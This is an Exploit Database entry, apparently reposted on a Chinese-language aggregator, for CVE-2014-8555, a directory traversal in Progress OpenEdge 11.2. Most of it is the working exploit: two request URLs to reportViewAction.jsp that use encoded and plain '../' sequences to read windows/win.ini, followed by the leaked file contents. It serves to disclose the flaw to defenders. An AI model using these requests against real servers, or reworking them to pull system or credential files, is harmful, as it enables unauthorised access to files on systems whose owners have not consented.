Progress OpenEdge 11.2 – Directory Traversal

• Exploit Database
• 92 阅读

• 作者： XLabs Security
  日期： 2014-10-31
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/35127/

• # Exploit Title: Progress OpenEdge Directory Traversal
  # Date: 30/10/2014
  # Exploit Author: Mauricio Correa
  # Vendor Homepage: www.progress.com
  # Software Link: www.progress.com/products/openedge
  # Version: 11.2
  # Tested on: Windows OS
  # CVE : CVE-2014-8555
  
   
  
  The malicious user sends a malformed request that generates the file access
  up directories as follows: 
  
   
  
  http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
  .%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini 
  
   
  
  or else 
  
   
  
  http://
  target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
  /../../windows/win.ini 
  
   
  
   
  
  And the application answers
  
   
  
  ; for 16-bit app support
  
  [fonts]
  
  [extensions]
  
  [mci extensions]
  
  [files]
  
  [Mail]
  
  MAPI=1
  
  CMCDLLNAME32=mapi32.dll
  
  CMC=1
  
  MAPIX=1
  
  MAPIXVER=1.0.0.1
  
  OLEMessaging=1
  
   
  
   
  
  More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256
  
   
  
  Thanks
  

  PowerShell

  Copy